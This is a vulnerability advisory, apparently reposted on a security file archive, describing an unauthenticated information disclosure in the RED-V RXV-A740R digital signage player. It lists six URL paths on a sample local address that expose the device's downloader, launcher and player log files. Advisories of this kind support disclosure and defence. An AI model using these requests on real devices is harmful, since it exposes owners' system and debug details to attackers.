exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RED-V Super Digital Signage System RXV-A740R Log Information Disclosure

RED-V Super Digital Signage System RXV-A740R Log Information Disclosure
Posted Nov 16, 2020
Authored by LiquidWorm | Site zeroscience.mk

RED-V Super Digital Signage System RXV-A740R is vulnerable to a sensitive information disclosure vulnerability. An unauthenticated attacker can visit several endpoints and disclose the webserver's log file list containing sensitive system resources and debug log information running on the device.

tags | exploit, info disclosure
SHA-256 | de09419a6625a08c5c653a4a0158f007d4e91c9ab31e72409a37bc77843119de

RED-V Super Digital Signage System RXV-A740R Log Information Disclosure

Change Mirror Download

RED-V Super Digital Signage System RXV-A740R Log Information Disclosure


Vendor: RED-V S.R.L.
Product web page: https://www.red-v.tv
https://red-v.tv/digital-signage.html
Affected version: Model name: RXV-A740R
Android version: 5.1.1
Firmware version: 026
Player version: 7.8.6
Downloader version: 7.5.2
Launcher version: 6.8.8

Summary: RED-V Super Digital Signage transforms simple screens
into customized TV channels, delivering audiovisual communication
as immersive user experiences. It is the final blending of years
of know-how in multimedia, mobile and web experience, tablet and
multimedia server design.

Desc: The application is vulnerable to sensitive information disclosure
vulnerability. An unauthenticated attacker can visit several endpoints
and disclose the webserver's log file list containing sensitive system
resources and debug log information running on the device.

Tested on: Apache Struts


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2020-5609
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php


26.10.2020

--


1. http://192.168.1.2:8080/downloader.log
2. http://192.168.1.2:8080/launcher.log
3. http://192.168.1.2:8080/player.log
4. http://192.168.1.2:8080/downloader.log_YYYY_MM_DD
5. http://192.168.1.2:8080/launcher.log_YYYY_MM_DD
6. http://192.168.1.2:8080/player.log_YYYY_MM_DD
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close